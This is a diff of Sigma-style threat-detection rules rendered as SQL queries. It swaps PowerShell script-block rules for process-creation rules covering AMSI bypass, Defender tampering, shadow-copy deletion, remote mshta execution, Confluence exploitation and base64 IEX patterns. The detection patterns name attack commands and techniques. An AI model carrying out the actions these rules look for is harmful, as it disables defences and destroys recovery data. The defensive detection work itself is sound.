version mismatch method", + "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001", - "attack.execution" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND ScriptBlockText LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND ScriptBlockText LIKE '%NonPublic,Static%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND (EngineVersion LIKE '2.%' ESCAPE '\\' OR EngineVersion LIKE '4.%' ESCAPE '\\' OR EngineVersion LIKE '5.%' ESCAPE '\\') AND HostVersion LIKE '3.%' ESCAPE '\\')" ], - "filename": "posh_ps_amsi_bypass_pattern_nov22.yml" + "filename": "posh_pc_exe_calling_ps.yml" }, { - "title": "Suspicious PowerShell Mailbox Export to Share - PS", - "id": "4a241dea-235b-4a7e-8d76-50d817b146c4", - "status": "experimental", - "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Delete Volume Shadow Copies Via WMI With PowerShell", + "id": "87df9ee1-5416-453a-8a08-e8d4a51e9ce1", + "status": "stable", + "description": "Shadow Copies deletion using operating systems utilities via PowerShell", + "author": "frack113", "tags": [ - "attack.exfiltration" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Mailbox %' ESCAPE '\\' AND ScriptBlockText LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Get-WmiObject%' ESCAPE '\\' AND HostApplication LIKE '% Win32\\_Shadowcopy%' ESCAPE '\\' AND (HostApplication LIKE '%Delete()%' ESCAPE '\\' OR HostApplication LIKE '%Remove-WmiObject%' ESCAPE '\\'))" ], - "filename": "posh_ps_mailboxexport_share.yml" + "filename": "posh_pc_delete_volume_shadow_copies.yml" }, { - "title": "Execution via CL_Invocation.ps1 - Powershell", - "id": "4cd29327-685a-460e-9dac-c3ab96e549dc", - "status": "experimental", - "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", - "author": "oscd.community, Natalia Shornikova", + "title": "Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt", + "id": "245f92e3-c4da-45f1-9070-bc552e06db11", + "status": "test", + "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1216" + "attack.initial_access", + "attack.execution", + "attack.t1190", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%SyncInvoke%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Atlassian\\\\Confluence\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%curl%' ESCAPE '\\' OR CommandLine LIKE '%ipconfig%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\'))" ], - "filename": "posh_ps_cl_invocation_lolscript.yml" + "filename": "proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell", - "id": "e55a5195-4724-480e-a77e-3ebe64bd3759", + "title": "Remotely Hosted HTA File Executed Via Mshta.EXE", + "id": "b98d0db6-511d-45de-ad02-e82a98729620", "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects execution of the \"mshta\" utility with an argument containing the \"http\" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1218.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%set%' ESCAPE '\\' AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%mshta%' ESCAPE '\\' AND ScriptBlockText LIKE '%vbscript:createobject%' ESCAPE '\\' AND ScriptBlockText LIKE '%.run%' ESCAPE '\\' AND ScriptBlockText LIKE '%(window.close)%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_via_use_mhsta.yml" + "filename": "proc_creation_win_mshta_http.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell", - "id": "0adfbc14-0ed1-11eb-adc1-0242ac120002", + "title": "Suspicious MSDT Parent Process", + "id": "7a74da6b-ea76-47db-92cc-874ad90df734", "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation", + "author": "Nextron Systems", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1036", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wmic.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wsl.exe' ESCAPE '\\') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe'))" ], - "filename": "posh_ps_invoke_obfuscation_var.yml" + "filename": "proc_creation_win_msdt_susp_parent.yml" }, { - "title": "Tamper Windows Defender - ScriptBlockLogging", - "id": "14c71865-6cd3-44ae-adaa-1db923fae5f2", - "status": "experimental", - "description": "Detects powershell scripts attempting to disable scheduled scanning and other parts of windows defender atp or set default actions to allow.", - "author": "frack113, elhoim, Tim Shelton (fps, alias support)", + "title": "Renamed MegaSync Execution", + "id": "643bdcac-8b82-49f4-9fd9-25a90b929f3b", + "status": "test", + "description": "Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.", + "author": "Sittikorn S", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Software that illegally integrates MegaSync in a renamed form", + "Administrators that have renamed MegaSync" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND ScriptBlockText LIKE '%Allow%' ESCAPE '\\' AND (ScriptBlockText LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (ScriptBlockText LIKE '%ltdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%mtdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%htdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%stdefac %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'megasync.exe' AND NOT (Image LIKE '%\\\\megasync.exe' ESCAPE '\\'))" ], - "filename": "posh_ps_tamper_defender.yml" + "filename": "proc_creation_win_renamed_megasync.yml" }, { - "title": "Suspicious PowerShell Invocations - Generic", - "id": "ed965133-513f-41d9-a441-e38076a0798f", + "title": "Regedit as Trusted Installer", + "id": "883835a7-df45-43e4-bf1d-4268768afda4", "status": "test", - "description": "Detects suspicious PowerShell invocation command parameters", + "description": "Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ - "Very special / sneaky PowerShell scripts" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '% -enc %' ESCAPE '\\' OR ScriptBlockText LIKE '% -EncodedCommand %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ec %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -w hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -window hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -w 1 %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -noni %' ESCAPE '\\' OR ScriptBlockText LIKE '% -noninteractive %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regedit.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\TrustedInstaller.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_invocation_generic.yml" + "filename": "proc_creation_win_regedit_trustedinstaller.yml" }, { - "title": "Silence.EDA Detection", - "id": "3ceb2083-a27f-449a-be33-14ec1b7cc973", - "status": "test", - "description": "Detects Silence EmpireDNSAgent as described in the Group-IP report", - "author": "Alina Stepchenkova, Group-IB, oscd.community", - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.command_and_control", - "attack.t1071.004", - "attack.t1572", - "attack.impact", - "attack.t1529", - "attack.g0091", - "attack.s0363" - ], + "title": "HackTool - PCHunter Execution", + "id": "fca949cc-79ca-446e-8064-01aa7e52ece5", + "status": "experimental", + "description": "Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Diagnostics.Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%Stop-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Restart-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Exception in execution%' ESCAPE '\\' AND ScriptBlockText LIKE '%$cmdargs%' ESCAPE '\\' AND ScriptBlockText LIKE '%Close-Dnscat2Tunnel%' ESCAPE '\\' AND ScriptBlockText LIKE '%set type=$LookupType`nserver%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Command | nslookup 2>&1 | Out-String%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-RandomDNSField%' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::ToString($SYNOptions, 16)%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session.Dead = $True%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session[\"Driver\"] -eq%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\PCHunter64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PCHunter32.exe' ESCAPE '\\') OR OriginalFileName = 'PCHunter.exe' OR Description = 'Epoolsoft Windows Information View Tools' OR (Hashes LIKE '%SHA1=5F1CBC3D99558307BC1250D084FA968521482025%' ESCAPE '\\' OR Hashes LIKE '%MD5=987B65CD9B9F4E9A1AFD8F8B48CF64A7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2B214BDDAAB130C274DE6204AF6DBA5AEEC7433DA99AA950022FA306421A6D32%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=444D210CEA1FF8112F256A4997EED7FF%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3FB89787CB97D902780DA080545584D97FB1C2EB%' ESCAPE '\\' OR Hashes LIKE '%MD5=228DD0C2E6287547E26FFBD973A40F14%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55F041BF4E78E9BFA6D4EE68BE40E496CE3A1353E1CA4306598589E19802522C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0479F44DF47CFA2EF1CCC4416A538663%' ESCAPE '\\') OR md5 IN ('228dd0c2e6287547e26ffbd973a40f14', '987b65cd9b9f4e9a1afd8f8b48cf64a7') OR sha1 IN ('5f1cbc3d99558307bc1250d084fa968521482025', '3fb89787cb97d902780da080545584d97fb1c2eb') OR sha256 IN ('2b214bddaab130c274de6204af6dba5aeec7433da99aa950022fa306421a6d32', '55f041bf4e78e9bfa6d4ee68be40e496ce3a1353e1ca4306598589e19802522c') OR Imphash IN ('444d210cea1ff8112f256a4997eed7ff', '0479f44df47cfa2ef1ccc4416a538663')))" ], - "filename": "posh_ps_apt_silence_eda.yml" + "filename": "proc_creation_win_hktl_pchunter.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell", - "id": "a5a30a6e-75ca-4233-8b8c-42e0f2037d3b", + "title": "HackTool - LocalPotato Execution", + "id": "6bd75993-9888-4f91-9404-e1e4e4e34b77", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "cve.2023.21746" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%rundll32%' ESCAPE '\\' AND ScriptBlockText LIKE '%shell32.dll%' ESCAPE '\\' AND ScriptBlockText LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ScriptBlockText LIKE '%value%' ESCAPE '\\' OR ScriptBlockText LIKE '%invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%comspec%' ESCAPE '\\' OR ScriptBlockText LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\LocalPotato.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe -i C:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%-o Windows\\\\%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=E1742EE971D6549E8D4D81115F88F1FC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DD82066EFBA94D7556EF582F247C8BB5%' ESCAPE '\\') OR Imphash IN ('E1742EE971D6549E8D4D81115F88F1FC', 'DD82066EFBA94D7556EF582F247C8BB5')))" ], - "filename": "posh_ps_invoke_obfuscation_via_use_rundll32.yml" + "filename": "proc_creation_win_hktl_localpotato.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell", - "id": "e54f5149-6ba3-49cf-b153-070d24679126", - "status": "experimental", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "title": "Suspicious Call by Ordinal", + "id": "e79a9e79-eb72-4e78-a628-0e7e8f59e89c", + "status": "stable", + "description": "Detects suspicious calls of DLLs in rundll32.dll exports by ordinal", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1218.011" ], "falsepositives": [ - "Unknown" + "False positives depend on scripts and administrative tools used in the monitored environment", + "Windows control panel elements have been identified as source (mmc)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,#%' ESCAPE '\\' OR CommandLine LIKE '%, #%' ESCAPE '\\' OR CommandLine LIKE '%.dll #%' ESCAPE '\\' OR CommandLine LIKE '%.ocx #%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%EDGEHTML.dll%' ESCAPE '\\' AND CommandLine LIKE '%#141%' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\VC\\\\Tools\\\\MSVC\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Tracker.exe%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\FileTracker32.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker32.dll\",#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll\",#1%' ESCAPE '\\'))))" ], - "filename": "posh_ps_invoke_obfuscation_via_var.yml" + "filename": "proc_creation_win_rundll32_by_ordinal.yml" }, { - "title": "Code Executed Via Office Add-in XLL File", - "id": "36fbec91-fa1b-4d5d-8df1-8d8edcb632ad", - "status": "test", - "description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system.\nOffice add-ins can be used to add functionality to Office programs\n", - "author": "frack113", - "tags": [ - "attack.persistence", - "attack.t1137.006" - ], + "title": "Suspicious PowerShell IEX Execution Patterns", + "id": "09576804-7a05-458e-a817-eb718ca91f54", + "status": "experimental", + "description": "Detects suspicious ways to run Invoke-Execution using IEX alias", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Legitimate scripts that use IEX" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%new-object %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComObject %' ESCAPE '\\' AND ScriptBlockText LIKE '%.application%' ESCAPE '\\' AND ScriptBlockText LIKE '%.RegisterXLL%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% | iex;%' ESCAPE '\\' OR CommandLine LIKE '% | iex %' ESCAPE '\\' OR CommandLine LIKE '% | iex}%' ESCAPE '\\' OR CommandLine LIKE '% | IEX ;%' ESCAPE '\\' OR CommandLine LIKE '% | IEX -Error%' ESCAPE '\\' OR CommandLine LIKE '% | IEX (new%' ESCAPE '\\' OR CommandLine LIKE '%);IEX %' ESCAPE '\\') AND (CommandLine LIKE '%::FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%.GetString([System.Convert]::%' ESCAPE '\\')) OR (CommandLine LIKE '%)|iex;$%' ESCAPE '\\' OR CommandLine LIKE '%);iex($%' ESCAPE '\\' OR CommandLine LIKE '%);iex $%' ESCAPE '\\' OR CommandLine LIKE '% | IEX | %' ESCAPE '\\')))" ], - "filename": "posh_ps_office_comobject_registerxll.yml" + "filename": "proc_creation_win_powershell_iex_patterns.yml" }, { - "title": "Disable Powershell Command History", - "id": "602f5669-6927-4688-84db-0d4b7afb2150", - "status": "experimental", - "description": "Detects scripts or commands that disabled the Powershell command history by removing psreadline module", - "author": "Ali Alwashali", + "title": "Potential Snatch Ransomware Activity", + "id": "5325945e-f1f0-406e-97b8-65104d393fff", + "status": "stable", + "description": "Detects specific process characteristics of Snatch ransomware word document droppers", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.003" + "attack.execution", + "attack.t1204" ], "falsepositives": [ - "Legitimate script that disables the command history" + "Scripts that shutdown the system immediately and reboot them in safe mode are unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-Module%' ESCAPE '\\' AND ScriptBlockText LIKE '%psreadline%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%shutdown /r /f /t 00%' ESCAPE '\\' OR CommandLine LIKE '%net stop SuperBackupMan%' ESCAPE '\\'))" ], - "filename": "posh_ps_disable_psreadline_command_history.yml" + "filename": "proc_creation_win_malware_snatch_ransomware.yml" }, { - "title": "Potential Persistence Via Security Descriptors - ScriptBlock", - "id": "2f77047c-e6e9-4c11-b088-a3de399524cd", - "status": "experimental", - "description": "Detects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. As seen used in the DAMP project.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Rar Usage with Password and Compression Level", + "id": "faa48cae-6b25-4f00-a094-08947fef582f", + "status": "test", + "description": "Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions.", + "author": "@ROxPinTeddy", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of Winrar command line version", + "Other command line tools, that use these flags" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_Trustee%' ESCAPE '\\' AND ScriptBlockText LIKE '%win32\\_Ace%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AccessMask%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AceType%' ESCAPE '\\' AND ScriptBlockText LIKE '%.SetSecurityDescriptor%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Lsa\\\\JD%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Skew1%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\GBG%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% -hp%' ESCAPE '\\' AND (CommandLine LIKE '% -m%' ESCAPE '\\' OR CommandLine LIKE '% a %' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_ace_tampering.yml" + "filename": "proc_creation_win_rar_compression_with_password.yml" }, { - "title": "Malicious ShellIntel PowerShell Commandlets", - "id": "402e1e1d-ad59-47b6-bf80-1ee44985b3a7", + "title": "Suspicious GUP Usage", + "id": "0a4f6091-223b-41f6-8743-f322ec84930b", "status": "test", - "description": "Detects Commandlet names from ShellIntel exploitation scripts.", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "description": "Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Execution of tools named GUP.exe and located in folders different than Notepad++\\updater" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-GPOLinks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Potato%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\GUP.exe' ESCAPE '\\' AND NOT (((Image LIKE '%\\\\Program Files\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR Image LIKE '%\\\\Program Files (x86)\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\AppData\\\\Local\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Roaming\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\'))))" ], - "filename": "posh_ps_shellintel_malicious_commandlets.yml" + "filename": "proc_creation_win_gup_suspicious_execution.yml" }, { - "title": "PowerShell Get-Process LSASS in ScriptBlock", - "id": "84c174ab-d3ef-481f-9c86-a50d0b8e3edb", - "status": "test", - "description": "Detects a Get-Process command on 